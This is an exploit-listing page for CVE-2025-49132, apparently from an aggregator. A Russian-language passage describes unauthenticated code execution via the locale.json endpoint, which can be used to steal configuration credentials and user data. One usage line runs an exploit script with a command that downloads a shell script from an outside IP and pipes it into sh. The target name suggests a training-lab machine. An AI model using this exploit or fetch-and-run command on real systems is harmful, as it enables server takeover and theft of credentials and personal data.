Sploitus

Exploit for CVE-2025-49132

kitploit · 2026-08-25

Exploit Code

MARKDOWN13 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SCROOLLOCKER-CVE-2025-49132
Воздействие

Используя /locales/locale.json с параметрами запроса locale и namespace, злоумышленник может выполнить произвольный код без аутентификации.

Обладая возможностью выполнять произвольный код, эту уязвимость можно использовать бесчисленным множеством способов. Она может быть использована для получения доступа к серверу панели, чтения учётных данных из конфигурации панели (.env или иных), извлечения конфиденциальной информации из базы данных (такой как данные пользователей [имя пользователя, email, имя и фамилия, хэш пароля, IP-адреса и т.д.]), доступа к файлам серверов, управляемых панелью, и т.д.

Как использовать

root@kitploit:~
    
    
    python exploit.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh'